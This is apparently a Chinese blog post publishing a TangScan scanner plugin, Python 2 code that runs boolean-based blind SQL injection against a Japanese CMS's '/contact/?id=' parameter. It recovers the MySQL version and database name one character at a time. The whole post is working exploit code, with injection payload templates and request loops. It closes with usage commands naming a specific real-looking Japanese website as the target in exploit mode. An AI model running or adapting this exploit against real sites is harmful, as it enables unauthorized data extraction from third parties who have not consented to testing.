TangScan-master 日本jp某通用程序SQL注入插件–‘盲注判断字符’

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# NOTE: Python 2 only -- the `print` statements and the `except Exception,e`
# syntax used below do not parse under Python 3.
import string
import time
from thirdparty import requests
from modules.exploit import TSExploit


class TangScan(TSExploit):
    """TangScan plugin: boolean-based blind SQL injection check on ``/contact/?id=``.

    ``verify()`` recovers the MySQL ``version()`` string one character at a
    time and reports the target as vulnerable only if that string contains
    "5."; ``exploit()`` recovers ``database()`` the same way.  Both methods
    report through ``self.result`` (``status`` / ``description`` / ``error``)
    and return None.
    """

    def __init__(self):
        # NOTE: super(self.__class__, ...) recurses forever if this class is
        # ever subclassed; super(TangScan, self) is the safe Python 2 form.
        super(self.__class__, self).__init__()
        # Plugin metadata consumed by the TangScan framework.  "desc" is a
        # user-facing string literal and is kept exactly as written.
        self.info = {
            "name": "Jp SQL injection",
            "product": "",
            "product_version": "",
            "desc": """
                日本某程序SQL漏洞检测插件
            """,
            "license": self.license.TS,
            "author": ["虾米 https://woj.app"],
            "ref": [
                {self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2016-0187803"},
            ],
            "type": self.type.injection,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        # The single required option: the target base URL, normalised by the
        # framework's url_field converter before verify()/exploit() read it.
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": ""
            }
        })
        # Result skeleton the framework reads back after verify()/exploit().
        self.register_result({
            "status": False,
            "data": {
            },
            "description": "",
            "error": ""
        })

    def verify(self):
        """Detect the injection by extracting the MySQL ``version()`` string.

        Oracle used by this code: each injected comparison is written with
        ``!=`` and ends in the constant ``'sbsb'='sbsb`` tail, and the code
        treats the presence of ``name="" method`` in the response body as the
        sign that the injected condition was *false* -- i.e. that the guessed
        length (first loop) or character (second loop) is correct.

        Request budget: up to 29 length probes plus up to 40 probes per
        character position, 0.3 s apart, each full URL printed to stdout
        before it is sent.

        Side effects: sets ``self.result.status`` (True only if the recovered
        version contains "5."), ``self.result.description`` on success, or
        ``self.result.error`` when a request raises.  Returns None.
        """
        user = ""
        user_length = 0
        url = ("{domain}/contact/?id=".format(domain=self.option.url))
        # Browser-like headers.  The User-Agent is a fixed string, so every
        # request from this plugin carries the same identifiable value.
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate"
        }
        # Candidate characters tried at each position, in this order.
        payloads = ['@','_','.', '-', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']+ list(string.ascii_lowercase)
        # Length probe and character probe templates.  The literal
        # 'sbsb'='sbsb' tail appears in every request URL this plugin sends,
        # which makes the traffic straightforward to match in server or WAF logs.
        l = "1' AND (length(version())-%s)!=0 AND 'sbsb'='sbsb"
        s = "1' AND ORD(MID((IFNULL(CAST(version() AS CHAR),0x20)),%s,1))!=%s AND 'sbsb'='sbsb"
        # Phase 1: find the length of version() (1..29); 0 means "not found".
        for x in range(1, 30):
            tmp = l % str(x)
            exps_url = url + tmp
            try:
                print exps_url
                # SECURITY: verify=False disables TLS certificate validation
                # for this request.
                response = requests.get(exps_url, timeout=15, headers=headers, verify=False)
                time.sleep(0.3)# rate-limit the requests
                # Any non-200 response aborts the whole check as "not vulnerable".
                if response.status_code != 200:
                    self.result.status = False
                    return
            except Exception,e:
                # Any exception from the request (timeout, connection error, ...)
                # aborts with the message stored in result.error.
                self.result.error = str(e)
                return
            if response.content.find("name=\"\" method") != -1:
                user_length = x
                break
        if user_length == 0:
            self.result.status = False
            return
        # Phase 2: recover one character per position.  If no candidate
        # matches at a position nothing is appended, so `user` can come back
        # shorter than user_length.
        for x in range(1, user_length+1):
            for payload in payloads:
                a = s % (str(x), str(ord(payload)))
                exps_url = url + a
                try:
                    print exps_url, user_length
                    # SECURITY: verify=False disables TLS certificate validation.
                    response = requests.get(exps_url, timeout=15, headers=headers, verify=False)
                    time.sleep(0.3)# rate-limit the requests
                    if response.status_code != 200:
                        self.result.status = False
                        return
                except Exception,e:
                    self.result.error = str(e)
                    return
                if response.content.find("name=\"\" method") != -1:
                    user = user + payload
                    break
        # Sanity filter: only a version string containing "5." is accepted.
        # This lowers false positives but also reports any target whose
        # version() lacks "5." as not vulnerable.
        if user.find("5.")==-1:# reduce the false-positive rate
            self.result.status = False
            return
        self.result.status = True
        self.result.description = "目标 {url} 存在SQL注入漏洞, 获取到的当前数据库版本为:{db_user}".format(
            url=self.option.url,
            db_user=user
        )

    def exploit(self):
        """Extract the current ``database()`` name using the same blind oracle as ``verify()``.

        Differences from ``verify()``: the length probe runs 1..99, nothing is
        printed to stdout, the candidate order is letters first, and there is
        no "5." sanity filter -- ``self.result.status`` is set True whenever
        the length probe succeeded, even if no character was recovered.

        Side effects: sets ``self.result.status`` and ``self.result.description``,
        or ``self.result.error`` when a request raises.  Returns None.
        """
        user = ""
        user_length = 0
        url = ("{domain}/contact/?id=".format(domain=self.option.url))
        # Same fixed browser-like headers as verify().
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate"
        }
        # Candidate characters, letters first here (the reverse of verify()).
        payloads = list(string.ascii_lowercase)+ ['@','_','.', '-', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
        # Same templates as verify() with database() in place of version();
        # the 'sbsb'='sbsb' tail is again present in every request URL.
        l = "1' AND (length(database())-%s)!=0 AND 'sbsb'='sbsb"
        s = "1' AND ORD(MID((IFNULL(CAST(database() AS CHAR),0x20)),%s,1))!=%s AND 'sbsb'='sbsb"
        # Phase 1: find the length of database() (1..99); 0 means "not found".
        for x in range(1, 100):
            tmp = l % str(x)
            exps_url = url + tmp
            try:
                # SECURITY: verify=False disables TLS certificate validation.
                response = requests.get(exps_url, timeout=15, headers=headers, verify=False)
                time.sleep(0.3)# rate-limit the requests
                if response.status_code != 200:
                    self.result.status = False
                    return
            except Exception,e:
                self.result.error = str(e)
                return
            if response.content.find("name=\"\" method") != -1:
                user_length = x
                break
        if user_length == 0:
            self.result.status = False
            return
        # Phase 2: one character per position; unmatched positions are
        # silently skipped, as in verify().
        for x in range(1, user_length+1):
            for payload in payloads:
                a = s % (str(x), str(ord(payload)))
                exps_url = url + a
                try:
                    # SECURITY: verify=False disables TLS certificate validation.
                    response = requests.get(exps_url, timeout=15, headers=headers, verify=False)
                    time.sleep(0.3)# rate-limit the requests
                    if response.status_code != 200:
                        self.result.status = False
                        return
                except Exception,e:
                    self.result.error = str(e)
                    return
                if response.content.find("name=\"\" method") != -1:
                    user = user + payload
                    break
        # No sanity filter here: status is True even when `user` is empty.
        self.result.status = True
        self.result.description = "目标 {url} 获取到的当前数据库名称为:{db_user}".format(
            url=self.option.url,
            db_user=user
        )


# CLI entry point: hand the plugin to the framework's main() when run directly.
if __name__ == '__main__':
    from modules.main import main
    main(TangScan())
使用命令: 789.py --url http://www.seanskitchen.jp --mode exploit
默认命令:789.py --url http://www.seanskitchen.jp --mode exploit
框架下载地址:https://github.com/WooYun/TangScan